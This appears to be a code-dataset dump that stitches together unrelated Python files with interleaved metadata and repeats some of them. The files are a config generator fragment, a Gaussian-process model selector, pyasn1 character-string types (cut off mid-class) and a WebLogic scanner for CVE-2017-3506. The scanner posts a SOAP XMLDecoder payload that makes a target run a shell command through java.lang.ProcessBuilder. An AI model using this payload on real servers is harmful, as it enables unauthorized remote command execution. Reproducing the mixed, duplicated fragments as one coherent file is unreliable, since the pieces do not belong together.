                        return self.create_config(subclss[selection], level + 1)
                    except (ValueError, IndexError):
                        print(textwrap.indent(f'Invalid value, please enter an integer from 0 to {len(subclss)-1}', ' '*level))
                        print(' ')
            else:
                # Non-interactive: leave a placeholder for the user to fill in.
                return {f'<{c_type.__name__}>': None}

    def _unpack_config_list(self, c_type, docs, level):
        """
        Configure a list of sub configurable configurations, optionally with user prompts
        for types.

        Args:
            c_type: Configurable - The Configurable to have a configuration constructed for.
            docs: str - The docs to print out in user prompts to explain the config purpose to
                the user.
            level: int - How many layers deep in a configuration heirarchy we are. This can
                help with printing prompts in interactive mode.

        Returns:
            dict - A dictionary containing the constructed configuration
        """
        formatted_docs = textwrap.indent('\n'.join(textwrap.wrap(docs, 80)), ' ')
        subtype = c_type.subtype
        if type(subtype) in (ConfigList, ConfigCollection):
            subtype_name = subtype.__class__.__name__
        else:
            subtype_name = subtype.__name__
        if self._interactive:
            inputting = True
            while inputting:
                print(textwrap.indent(f'Choose number of elements in Config List of type "{subtype_name}":\n-\n{formatted_docs}\n-', ' '*level + '+ '))
                try:
                    number_elem = int(input(' '*level + '+ '))
                    if number_elem < 0: raise ValueError
                    print(' ')
                    inputting = False
                except ValueError:
                    print(textwrap.indent(f'Invalid value, please enter a positive integer', ' '*level))
                    print(' ')
            # number_elem is only bound once a valid count was entered, so the
            # list construction must stay inside the interactive branch.
            cfg = []
            for _ in range(number_elem):
                if type(subtype) not in (ConfigList, ConfigCollection):
                    docs = ''
                cfg += [self._populate_config(subtype, docs, level+1)]
            return cfg
        # NOTE(review): no non-interactive branch is visible in the original;
        # non-interactive mode falls through and returns None — confirm.

    def _unpack_config_collection(self, c_type, docs, level):
        """
        Configure a collection of sub configurable configurations, optionally with user prompts
        for types.

        Args:
            c_type: ConfigCollection - The Configurable Collection to have a configuration constructed for.
            docs: str - The docs to print out in user prompts to explain the config purpose to
                the user.
            level: int - How many layers deep in a configuration heirarchy we are. This can
                help with printing prompts in interactive mode.

        Returns:
            dict - A dictionary containing the constructed configuration
        """
        formatted_docs = textwrap.indent('\n'.join(textwrap.wrap(docs, 80)), ' ')
        subtype = c_type.subtype
        if type(subtype) in (ConfigList, ConfigCollection):
            subtype_name = subtype.__class__.__name__
        else:
            subtype_name = subtype.__name__
        if self._interactive:
            inputting = True
            cfg = {}
            while inputting:
                print(textwrap.indent(f'Creating a collection of type "{subtype_name}":\n-\n{formatted_docs}\n-', ' '*level + '+ '))
                print(textwrap.indent(f'Choose a name for an element in collection of type "{subtype_name}", \nor press enter to finish generating this collection:', ' '*level + '+ '))
                name = input(' '*level + '+ ')
                print(' ')
                if len(name) == 0 or name.isspace():
                    # Blank name terminates collection entry.
                    inputting = False
                else:
                    if type(subtype) not in (ConfigList, ConfigCollection):
                        docs = ''
                    cfg[name] = self._populate_config(subtype, docs, level+1)
            return cfg
        # NOTE(review): no non-interactive branch is visible in the original;
        # non-interactive mode falls through and returns None — confirm.

    def _populate_config(self, cfgrble_type, docs, lvl):
        """
        A hub function to distribute the configuration construction to the correct handler, based on the type
        of configuration required.

        Args:
            cfgrble_type: (Configurable, ConfigList, or ConfigCollection) - A type of configuration to be constructed.
            docs: str - The docs describing the configuration to be constructed.
            lvl: int - How deep in a configuration heirarchy we are - useful for pretty printing user prompts.

        Returns:
            The configuration produced by the matching handler.
        """
        if type(cfgrble_type) is ConfigList:
            value = self._unpack_config_list(cfgrble_type, docs, lvl)
        elif type(cfgrble_type) is ConfigCollection:
            value = self._unpack_config_collection(cfgrble_type, docs, lvl)
        else:
            value = self._get_subconfig(cfgrble_type, docs, lvl)
        return value
|
en
| 0.763474
|
# coding=utf-8 # Copyright 2021 Pandora Media, LLC. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # Python standard library imports # Third party imports # Local imports A class for making configurations for class hierarchies out of the box. **Constructor** Args: interactive: bool - Whether to prompt user for input when constructing a configuration. Generates a configuration for this configurable, with all default values filled out, comments in place, and sub-configurables selected by the user (or placeholders are inserted). Args: cls: Configurable - A Configurable class to construct a configuration for. level: int - How many layers deep in a configuration heirarchy we are. This can help with printing prompts in interactive mode. Returns: Config - The constructed configurable with placeholders where no defaults exist. # Add defaults # Add configurables # Add required parameters and comments Configure a sub configurable configuration, optionally with user prompts for types. Args: c_type: Configurable - The Configurable to have a configuration constructed for. docs: str - The docs to print out in user prompts to explain the config purpose to the user. level: int - How many layers deep in a configuration heirarchy we are. This can help with printing prompts in interactive mode. Returns: dict - A dictionary containing the constructed configuration # Prevent negative indexing in UI. Configure a list of sub configurable configurations, optionally with user prompts for types. 
Args: c_type: Configurable - The Configurable to have a configuration constructed for. docs: str - The docs to print out in user prompts to explain the config purpose to the user. level: int - How many layers deep in a configuration heirarchy we are. This can help with printing prompts in interactive mode. Returns: dict - A dictionary containing the constructed configuration Configure a collection of sub configurable configurations, optionally with user prompts for types. Args: c_type: ConfigCollection - The Configurable Collection to have a configuration constructed for. docs: str - The docs to print out in user prompts to explain the config purpose to the user. level: int - How many layers deep in a configuration heirarchy we are. This can help with printing prompts in interactive mode. Returns: dict - A dictionary containing the constructed configuration A hub function to distribute the configuration construction to the correct handler, based on the type of configuration required. Args: cfgrble_type: (Configurable, ConfigList, or ConfigCollection) - A type of configuration to be constructed. docs: str - The docs describing the configuration to be constructed. lvl: int - How deep in a configuration heirarchy we are - useful for pretty printing user prompts.
| 2.266457
| 2
|
src/autoks/core/model_selection/boms_model_selector.py
|
lschlessinger1/MS-project
| 2
|
6628055
|
from typing import List, Callable, Optional, Union
from src.autoks.backend.model import RawGPModelType
from src.autoks.callbacks import CallbackList
from src.autoks.core.covariance import Covariance
from src.autoks.core.gp_model_population import GPModelPopulation
from src.autoks.core.grammar import BomsGrammar
from src.autoks.core.hyperprior import boms_hyperpriors
from src.autoks.core.model_selection.base import ModelSelector
class BomsModelSelector(ModelSelector):
    """Model selector for BOMS-style search over GP covariance structures.

    Uses a :class:`BomsGrammar` (with BOMS hyperpriors by default) to propose
    candidate covariances and defaults GP evaluation to Laplace approximate
    inference.
    """

    def __init__(self,
                 grammar: Optional[BomsGrammar] = None,
                 base_kernel_names: Optional[List[str]] = None,
                 fitness_fn: Union[str, Callable[[RawGPModelType], float]] = 'loglikn',
                 n_parents: int = 1,
                 additive_form: bool = False,
                 gp_fn: Union[str, Callable] = 'gp_regression',
                 gp_args: Optional[dict] = None,
                 optimizer: Optional[str] = None,
                 n_restarts_optimizer: int = 3):
        if grammar is None:
            hyperpriors = boms_hyperpriors()
            grammar = BomsGrammar(hyperpriors=hyperpriors, base_kernel_names=base_kernel_names)
        # Use Laplace inference by default. BUGFIX: the original `else`
        # branch replaced the whole user-supplied gp_args dict with
        # {'inference_method': 'laplace'} whenever 'inference_method' was
        # already present, discarding every other user setting. Preserve the
        # caller's arguments and only fill in the default.
        if gp_args is None:
            gp_args = {'inference_method': 'laplace'}
        else:
            gp_args = dict(gp_args)  # don't mutate the caller's dict
            gp_args.setdefault('inference_method', 'laplace')
        super().__init__(grammar, fitness_fn, n_parents, additive_form, gp_fn, gp_args,
                         optimizer, n_restarts_optimizer)

    def _train(self,
               eval_budget: int,
               max_generations: int,
               callbacks: CallbackList,
               verbose: int = 1) -> GPModelPopulation:
        # Training loop intentionally not implemented for this selector
        # (abstract hook satisfied with a no-op).
        pass

    def _get_initial_candidate_covariances(self) -> List[Covariance]:
        """Seed candidates: brute-force grammar expansion to a shallow depth."""
        initial_level_depth = 2
        max_number_of_initial_models = 500
        initial_candidates = self.grammar.expand_full_brute_force(initial_level_depth,
                                                                  max_number_of_initial_models)
        return initial_candidates

    def _initialize(self,
                    eval_budget: int,
                    callbacks: CallbackList,
                    verbose: int = 0) -> GPModelPopulation:
        """Build the starting population, evaluating only the first candidate."""
        population = GPModelPopulation()
        # initialize models; only index 0 is evaluated up front, but the full
        # candidate set is placed into the population.
        initial_candidates = self._get_initial_candidates()
        indices = [0]
        initial_models = [initial_candidates[i] for i in indices]
        self._evaluate_models(initial_models, eval_budget, callbacks=callbacks, verbose=verbose)
        population.update(initial_candidates)
        return population

    @classmethod
    def _build_from_input_dict(cls, input_dict: dict):
        # Remove fields the base-class builder does not accept, then
        # re-attach them to the constructed instance.
        standardize_x = input_dict.pop('standardize_x')
        standardize_y = input_dict.pop('standardize_y')
        model_selector = super()._build_from_input_dict(input_dict)
        model_selector.standardize_x = standardize_x
        model_selector.standardize_y = standardize_y
        return model_selector

    def __str__(self):
        return self.name
|
from typing import List, Callable, Optional, Union
from src.autoks.backend.model import RawGPModelType
from src.autoks.callbacks import CallbackList
from src.autoks.core.covariance import Covariance
from src.autoks.core.gp_model_population import GPModelPopulation
from src.autoks.core.grammar import BomsGrammar
from src.autoks.core.hyperprior import boms_hyperpriors
from src.autoks.core.model_selection.base import ModelSelector
class BomsModelSelector(ModelSelector):
    """Model selector for BOMS-style search over GP covariance structures.

    Uses a :class:`BomsGrammar` (with BOMS hyperpriors by default) to propose
    candidate covariances and defaults GP evaluation to Laplace approximate
    inference.
    """

    def __init__(self,
                 grammar: Optional[BomsGrammar] = None,
                 base_kernel_names: Optional[List[str]] = None,
                 fitness_fn: Union[str, Callable[[RawGPModelType], float]] = 'loglikn',
                 n_parents: int = 1,
                 additive_form: bool = False,
                 gp_fn: Union[str, Callable] = 'gp_regression',
                 gp_args: Optional[dict] = None,
                 optimizer: Optional[str] = None,
                 n_restarts_optimizer: int = 3):
        if grammar is None:
            hyperpriors = boms_hyperpriors()
            grammar = BomsGrammar(hyperpriors=hyperpriors, base_kernel_names=base_kernel_names)
        # Use Laplace inference by default. BUGFIX: the original `else`
        # branch replaced the whole user-supplied gp_args dict with
        # {'inference_method': 'laplace'} whenever 'inference_method' was
        # already present, discarding every other user setting. Preserve the
        # caller's arguments and only fill in the default.
        if gp_args is None:
            gp_args = {'inference_method': 'laplace'}
        else:
            gp_args = dict(gp_args)  # don't mutate the caller's dict
            gp_args.setdefault('inference_method', 'laplace')
        super().__init__(grammar, fitness_fn, n_parents, additive_form, gp_fn, gp_args,
                         optimizer, n_restarts_optimizer)

    def _train(self,
               eval_budget: int,
               max_generations: int,
               callbacks: CallbackList,
               verbose: int = 1) -> GPModelPopulation:
        # Training loop intentionally not implemented for this selector
        # (abstract hook satisfied with a no-op).
        pass

    def _get_initial_candidate_covariances(self) -> List[Covariance]:
        """Seed candidates: brute-force grammar expansion to a shallow depth."""
        initial_level_depth = 2
        max_number_of_initial_models = 500
        initial_candidates = self.grammar.expand_full_brute_force(initial_level_depth,
                                                                  max_number_of_initial_models)
        return initial_candidates

    def _initialize(self,
                    eval_budget: int,
                    callbacks: CallbackList,
                    verbose: int = 0) -> GPModelPopulation:
        """Build the starting population, evaluating only the first candidate."""
        population = GPModelPopulation()
        # initialize models; only index 0 is evaluated up front, but the full
        # candidate set is placed into the population.
        initial_candidates = self._get_initial_candidates()
        indices = [0]
        initial_models = [initial_candidates[i] for i in indices]
        self._evaluate_models(initial_models, eval_budget, callbacks=callbacks, verbose=verbose)
        population.update(initial_candidates)
        return population

    @classmethod
    def _build_from_input_dict(cls, input_dict: dict):
        # Remove fields the base-class builder does not accept, then
        # re-attach them to the constructed instance.
        standardize_x = input_dict.pop('standardize_x')
        standardize_y = input_dict.pop('standardize_y')
        model_selector = super()._build_from_input_dict(input_dict)
        model_selector.standardize_x = standardize_x
        model_selector.standardize_y = standardize_y
        return model_selector

    def __str__(self):
        return self.name
|
en
| 0.590313
|
# Use Laplace inference by default. # initialize models
| 2.156649
| 2
|
WeblogicScanLot/poc/CVE_2017_3506.py
|
y11en/super-guacamole
| 32
|
6628056
|
#!/usr/bin/env python3
# _*_ coding:utf-8 _*_
'''
____ _ _ _ _ __ __ _
| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __
| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ /
| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ <
|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\
'''
import sys
import requests
import re
import logging
# Scan results are written to a log file (overwritten on each run), not stdout.
logging.basicConfig(filename='Weblogic.log',
                    format='%(asctime)s %(message)s',
                    filemode="w", level=logging.INFO)
# CVE identifiers reported by poc(); selected via its `index` argument.
VUL=['CVE-2017-3506']
# User-Agent header sent with every probe request.
headers = {'user-agent': 'ceshi/0.0.1'}
def poc(url, index):
    """Check one WebLogic target for CVE-2017-3506 (wls-wsat XMLDecoder RCE).

    Posts a SOAP request whose WorkContext header carries an XMLDecoder
    ProcessBuilder payload; a vulnerable server reflects a telltale
    ``<faultstring>`` in its response. The verdict is written to the module
    logger, never returned.

    Args:
        url: target as ``host:port`` or a full http(s) URL.
        index: index into ``VUL`` of the CVE identifier to report.
    """
    rurl = url
    if not url.startswith("http"):
        url = "http://" + url
    # BUGFIX: the original guard `if "/" in url:` was always true once the
    # scheme was prepended (dead condition), and a URL ending in "/" produced
    # a "//wls-wsat/..." double slash. Normalise the trailing slash instead.
    url = url.rstrip("/") + '/wls-wsat/CoordinatorPortType'
    post_str = '''
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>whoami</string>
</void>
</array>
<void method="start"/>
</object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
'''
    try:
        # verify=False: admin ports commonly use self-signed certificates.
        response = requests.post(url, data=post_str, verify=False, timeout=5, headers=headers)
        response = response.text
        # .group(0) raises AttributeError when nothing matches; that, like any
        # network failure, falls through to the "not detected" branch.
        response = re.search(r"\<faultstring\>.*\<\/faultstring\>", response).group(0)
    except Exception:
        response = ""
    if '<faultstring>java.lang.ProcessBuilder' in response or "<faultstring>0" in response:
        logging.info('[+]{} has a JAVA deserialization vulnerability:{}.'.format(rurl,VUL[index]))
    else:
        logging.info('[-]{} not detected {}.'.format(rurl,VUL[index]))
def run(rip, rport, index):
    """Join host and port into a target string and hand off to poc()."""
    target = '{}:{}'.format(rip, rport)
    poc(url=target, index=index)
if __name__ == '__main__':
    # Usage: script.py <host> <port>
    target_host = sys.argv[1]
    target_port = int(sys.argv[2])
    run(target_host, target_port, 0)
|
#!/usr/bin/env python3
# _*_ coding:utf-8 _*_
'''
____ _ _ _ _ __ __ _
| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __
| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ /
| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ <
|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\
'''
import sys
import requests
import re
import logging
# Scan results are written to a log file (overwritten on each run), not stdout.
logging.basicConfig(filename='Weblogic.log',
                    format='%(asctime)s %(message)s',
                    filemode="w", level=logging.INFO)
# CVE identifiers reported by poc(); selected via its `index` argument.
VUL=['CVE-2017-3506']
# User-Agent header sent with every probe request.
headers = {'user-agent': 'ceshi/0.0.1'}
def poc(url, index):
    """Check one WebLogic target for CVE-2017-3506 (wls-wsat XMLDecoder RCE).

    Posts a SOAP request whose WorkContext header carries an XMLDecoder
    ProcessBuilder payload; a vulnerable server reflects a telltale
    ``<faultstring>`` in its response. The verdict is written to the module
    logger, never returned.

    Args:
        url: target as ``host:port`` or a full http(s) URL.
        index: index into ``VUL`` of the CVE identifier to report.
    """
    rurl = url
    if not url.startswith("http"):
        url = "http://" + url
    # BUGFIX: the original guard `if "/" in url:` was always true once the
    # scheme was prepended (dead condition), and a URL ending in "/" produced
    # a "//wls-wsat/..." double slash. Normalise the trailing slash instead.
    url = url.rstrip("/") + '/wls-wsat/CoordinatorPortType'
    post_str = '''
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>whoami</string>
</void>
</array>
<void method="start"/>
</object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
'''
    try:
        # verify=False: admin ports commonly use self-signed certificates.
        response = requests.post(url, data=post_str, verify=False, timeout=5, headers=headers)
        response = response.text
        # .group(0) raises AttributeError when nothing matches; that, like any
        # network failure, falls through to the "not detected" branch.
        response = re.search(r"\<faultstring\>.*\<\/faultstring\>", response).group(0)
    except Exception:
        response = ""
    if '<faultstring>java.lang.ProcessBuilder' in response or "<faultstring>0" in response:
        logging.info('[+]{} has a JAVA deserialization vulnerability:{}.'.format(rurl,VUL[index]))
    else:
        logging.info('[-]{} not detected {}.'.format(rurl,VUL[index]))
def run(rip, rport, index):
    """Join host and port into a target string and hand off to poc()."""
    target = '{}:{}'.format(rip, rport)
    poc(url=target, index=index)
if __name__ == '__main__':
    # Usage: script.py <host> <port>
    target_host = sys.argv[1]
    target_port = int(sys.argv[2])
    run(target_host, target_port, 0)
|
en
| 0.288145
|
#!/usr/bin/env python3 # _*_ coding:utf-8 _*_ ____ _ _ _ _ __ __ _
| _ \ __ _| |__ | |__ (_) |_| \/ | __ _ ___| | __
| |_) / _` | '_ \| '_ \| | __| |\/| |/ _` / __| |/ /
| _ < (_| | |_) | |_) | | |_| | | | (_| \__ \ <
|_| \_\__,_|_.__/|_.__/|_|\__|_| |_|\__,_|___/_|\_\ <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java>
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>whoami</string>
</void>
</array>
<void method="start"/>
</object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
| 2.158667
| 2
|
pyasn1/type/char.py
|
EnjoyLifeFund/py36pkgs
| 39
|
6628057
|
#
# This file is part of pyasn1 software.
#
# Copyright (c) 2005-2017, <NAME> <<EMAIL>>
# License: http://pyasn1.sf.net/license.html
#
import sys
from pyasn1.type import univ, tag
from pyasn1 import error
__all__ = ['NumericString', 'PrintableString', 'TeletexString', 'T61String', 'VideotexString',
'IA5String', 'GraphicString', 'VisibleString', 'ISO646String',
'GeneralString', 'UniversalString', 'BMPString', 'UTF8String']
# Re-export the univ "no value" sentinels so this module's users don't need
# to import pyasn1.type.univ directly.
NoValue = univ.NoValue
noValue = univ.noValue
class AbstractCharacterString(univ.OctetString):
    """Creates |ASN.1| type or object.

    |ASN.1| objects are immutable and duck-type Python 2 :class:`unicode` or Python 3 :class:`str`.
    When used in octet-stream context, |ASN.1| type assumes "|encoding|" encoding.

    Parameters
    ----------
    value: :class:`unicode`, :class:`str`, :class:`bytes` or |ASN.1| object
        unicode object (Python 2) or string (Python 3), alternatively string
        (Python 2) or bytes (Python 3) representing octet-stream of serialized
        unicode string (note `encoding` parameter) or |ASN.1| class instance.
    tagSet: :py:class:`~pyasn1.type.tag.TagSet`
        Object representing non-default ASN.1 tag(s)
    subtypeSpec: :py:class:`~pyasn1.type.constraint.ConstraintsIntersection`
        Object representing non-default ASN.1 subtype constraint(s)
    encoding: :py:class:`str`
        Unicode codec ID to encode/decode :class:`unicode` (Python 2) or
        :class:`str` (Python 3) the payload when |ASN.1| object is used
        in octet-stream context.

    Raises
    ------
    : :py:class:`pyasn1.error.PyAsn1Error`
        On constraint violation or bad initializer.
    """
    # The payload (self._value) is always held as text; the two branches
    # below install text<->bytes conversion helpers appropriate for the
    # interpreter the class is defined under.
    if sys.version_info[0] <= 2:
        def __str__(self):
            # On Python 2, str() must yield bytes: serialize the text
            # payload with this type's codec.
            try:
                return self._value.encode(self.encoding)
            except UnicodeEncodeError:
                raise error.PyAsn1Error(
                    'Can\'t encode string \'%s\' with \'%s\' codec' % (self._value, self.encoding)
                )

        def __unicode__(self):
            return unicode(self._value)

        def prettyIn(self, value):
            # Normalise any accepted initializer into the canonical internal
            # (unicode) representation.
            if isinstance(value, unicode):
                return value
            elif isinstance(value, str):
                try:
                    return value.decode(self.encoding)
                except (LookupError, UnicodeDecodeError):
                    raise error.PyAsn1Error(
                        'Can\'t decode string \'%s\' with \'%s\' codec' % (value, self.encoding)
                    )
            elif isinstance(value, (tuple, list)):
                # Sequence of integer code points: build a string and recurse
                # through the str branch above.
                try:
                    return self.prettyIn(''.join([chr(x) for x in value]))
                except ValueError:
                    raise error.PyAsn1Error(
                        'Bad %s initializer \'%s\'' % (self.__class__.__name__, value)
                    )
            else:
                try:
                    return unicode(value)
                except UnicodeDecodeError:
                    raise error.PyAsn1Error(
                        'Can\'t turn object \'%s\' into unicode' % (value,)
                    )

        def asOctets(self, padding=True):
            # Serialized (byte) form of the payload.
            return str(self)

        def asNumbers(self, padding=True):
            # Serialized form as a tuple of integer octet values.
            return tuple([ord(x) for x in str(self)])

    else:
        def __str__(self):
            return str(self._value)

        def __bytes__(self):
            # Serialize the text payload with this type's codec.
            try:
                return self._value.encode(self.encoding)
            except UnicodeEncodeError:
                raise error.PyAsn1Error(
                    'Can\'t encode string \'%s\' with \'%s\' codec' % (self._value, self.encoding)
                )

        def prettyIn(self, value):
            # Normalise any accepted initializer into the canonical internal
            # (str) representation.
            if isinstance(value, str):
                return value
            elif isinstance(value, bytes):
                try:
                    return value.decode(self.encoding)
                except UnicodeDecodeError:
                    raise error.PyAsn1Error(
                        'Can\'t decode string \'%s\' with \'%s\' codec' % (value, self.encoding)
                    )
            elif isinstance(value, (tuple, list)):
                # Sequence of integer octet values -> bytes -> recurse.
                return self.prettyIn(bytes(value))
            else:
                try:
                    return str(value)
                except (UnicodeDecodeError, ValueError):
                    raise error.PyAsn1Error(
                        'Can\'t turn object \'%s\' into unicode' % (value,)
                    )

        def asOctets(self, padding=True):
            # Serialized (byte) form of the payload.
            return bytes(self)

        def asNumbers(self, padding=True):
            # Serialized form as a tuple of integer octet values.
            return tuple(bytes(self))

    def prettyOut(self, value):
        return value

    def __reversed__(self):
        return reversed(self._value)

    def clone(self, value=noValue, **kwargs):
        """Creates a copy of a |ASN.1| type or object.

        Any parameters to the *clone()* method will replace corresponding
        properties of the |ASN.1| object.

        Parameters
        ----------
        value: :class:`unicode`, :class:`str`, :class:`bytes` or |ASN.1| object
            unicode object (Python 2) or string (Python 3), alternatively string
            (Python 2) or bytes (Python 3) representing octet-stream of serialized
            unicode string (note `encoding` parameter) or |ASN.1| class instance.
        tagSet: :py:class:`~pyasn1.type.tag.TagSet`
            Object representing non-default ASN.1 tag(s)
        subtypeSpec: :py:class:`~pyasn1.type.constraint.ConstraintsIntersection`
            Object representing non-default ASN.1 subtype constraint(s)
        encoding: :py:class:`str`
            Unicode codec ID to encode/decode :py:class:`unicode` (Python 2) or
            :py:class:`str` (Python 3) the payload when |ASN.1| object is used
            in octet-stream context.

        Returns
        -------
        :
            new instance of |ASN.1| type/value
        """
        return univ.OctetString.clone(self, value, **kwargs)

    def subtype(self, value=noValue, **kwargs):
        """Creates a copy of a |ASN.1| type or object.

        Any parameters to the *subtype()* method will be added to the corresponding
        properties of the |ASN.1| object.

        Parameters
        ----------
        value: :class:`unicode`, :class:`str`, :class:`bytes` or |ASN.1| object
            unicode object (Python 2) or string (Python 3), alternatively string
            (Python 2) or bytes (Python 3) representing octet-stream of serialized
            unicode string (note `encoding` parameter) or |ASN.1| class instance.
        implicitTag: :py:class:`~pyasn1.type.tag.Tag`
            Implicitly apply given ASN.1 tag object to caller's
            :py:class:`~pyasn1.type.tag.TagSet`, then use the result as
            new object's ASN.1 tag(s).
        explicitTag: :py:class:`~pyasn1.type.tag.Tag`
            Explicitly apply given ASN.1 tag object to caller's
            :py:class:`~pyasn1.type.tag.TagSet`, then use the result as
            new object's ASN.1 tag(s).
        subtypeSpec: :py:class:`~pyasn1.type.constraint.ConstraintsIntersection`
            Object representing non-default ASN.1 subtype constraint(s)
        encoding: :py:class:`str`
            Unicode codec ID to encode/decode :py:class:`unicode` (Python 2) or
            :py:class:`str` (Python 3) the payload when |ASN.1| object is used
            in octet-stream context.

        Returns
        -------
        :
            new instance of |ASN.1| type/value
        """
        return univ.OctetString.subtype(self, value, **kwargs)
class NumericString(AbstractCharacterString):
    # ASN.1 NumericString: implicit universal tag 18, ASCII payload.
    __doc__ = AbstractCharacterString.__doc__

    #: Set (on class, not on instance) or return a
    #: :py:class:`~pyasn1.type.tag.TagSet` object representing ASN.1 tag(s)
    #: associated with |ASN.1| type.
    tagSet = AbstractCharacterString.tagSet.tagImplicitly(
        tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 18)
    )
    encoding = 'us-ascii'

    # Optimization for faster codec lookup
    typeId = AbstractCharacterString.getTypeId()


class PrintableString(AbstractCharacterString):
    # ASN.1 PrintableString: implicit universal tag 19, ASCII payload.
    __doc__ = AbstractCharacterString.__doc__

    #: Set (on class, not on instance) or return a
    #: :py:class:`~pyasn1.type.tag.TagSet` object representing ASN.1 tag(s)
    #: associated with |ASN.1| type.
    tagSet = AbstractCharacterString.tagSet.tagImplicitly(
        tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 19)
    )
    encoding = 'us-ascii'

    # Optimization for faster codec lookup
    typeId = AbstractCharacterString.getTypeId()


class TeletexString(AbstractCharacterString):
    # ASN.1 TeletexString: implicit universal tag 20, Latin-1 payload.
    __doc__ = AbstractCharacterString.__doc__

    #: Set (on class, not on instance) or return a
    #: :py:class:`~pyasn1.type.tag.TagSet` object representing ASN.1 tag(s)
    #: associated with |ASN.1| type.
    tagSet = AbstractCharacterString.tagSet.tagImplicitly(
        tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 20)
    )
    encoding = 'iso-8859-1'

    # Optimization for faster codec lookup
    typeId = AbstractCharacterString.getTypeId()


class T61String(TeletexString):
    # T61String is an alias of TeletexString (same tag and encoding).
    __doc__ = TeletexString.__doc__

    # Optimization for faster codec lookup
    typeId = AbstractCharacterString.getTypeId()


class VideotexString(AbstractCharacterString):
    # ASN.1 VideotexString: implicit universal tag 21, Latin-1 payload.
    __doc__ = AbstractCharacterString.__doc__

    #: Set (on class, not on instance) or return a
    #: :py:class:`~pyasn1.type.tag.TagSet` object representing ASN.1 tag(s)
    #: associated with |ASN.1| type.
    tagSet = AbstractCharacterString.tagSet.tagImplicitly(
        tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 21)
    )
    encoding = 'iso-8859-1'

    # Optimization for faster codec lookup
    typeId = AbstractCharacterString.getTypeId()


class IA5String(AbstractCharacterString):
    # ASN.1 IA5String: implicit universal tag 22, ASCII payload.
    __doc__ = AbstractCharacterString.__doc__

    #: Set (on class, not on instance) or return a
    #: :py:class:`~pyasn1.type.tag.TagSet` object representing ASN.1 tag(s)
    #: associated with |ASN.1| type.
    tagSet = AbstractCharacterString.tagSet.tagImplicitly(
        tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 22)
    )
    encoding = 'us-ascii'

    # Optimization for faster codec lookup
    typeId = AbstractCharacterString.getTypeId()


class GraphicString(AbstractCharacterString):
    # ASN.1 GraphicString: implicit universal tag 25, Latin-1 payload.
    __doc__ = AbstractCharacterString.__doc__

    #: Set (on class, not on instance) or return a
    #: :py:class:`~pyasn1.type.tag.TagSet` object representing ASN.1 tag(s)
    #: associated with |ASN.1| type.
    tagSet = AbstractCharacterString.tagSet.tagImplicitly(
        tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 25)
    )
    encoding = 'iso-8859-1'

    # Optimization for faster codec lookup
    typeId = AbstractCharacterString.getTypeId()


class VisibleString(AbstractCharacterString):
    # ASN.1 VisibleString: implicit universal tag 26, ASCII payload.
    __doc__ = AbstractCharacterString.__doc__

    #: Set (on class, not on instance) or return a
    #: :py:class:`~pyasn1.type.tag.TagSet` object representing ASN.1 tag(s)
    #: associated with |ASN.1| type.
    tagSet = AbstractCharacterString.tagSet.tagImplicitly(
        tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 26)
    )
    encoding = 'us-ascii'

    # Optimization for faster codec lookup
    typeId = AbstractCharacterString.getTypeId()


class ISO646String(VisibleString):
    # ISO646String is an alias of VisibleString (same tag and encoding).
    __doc__ = VisibleString.__doc__

    # Optimization for faster codec lookup
    typeId = AbstractCharacterString.getTypeId()


class GeneralString(AbstractCharacterString):
    # ASN.1 GeneralString: implicit universal tag 27, Latin-1 payload.
    __doc__ = AbstractCharacterString.__doc__

    #: Set (on class, not on instance) or return a
    #: :py:class:`~pyasn1.type.tag.TagSet` object representing ASN.1 tag(s)
    #: associated with |ASN.1| type.
    tagSet = AbstractCharacterString.tagSet.tagImplicitly(
        tag.Tag(tag.tagClassUniversal, tag.tagFormatSimple, 27)
    )
    encoding = 'iso-8859-1'

    # Optimization for faster codec lookup
    typeId = AbstractCharacterString.getTypeId()


class UniversalString(AbstractCharacterString):
    # ASN.1 UniversalString: implicit universal tag 28, UTF-32BE payload.
    __doc__ = AbstractCharacterString.__doc__

    #: Set (on class, not on instance) or return a
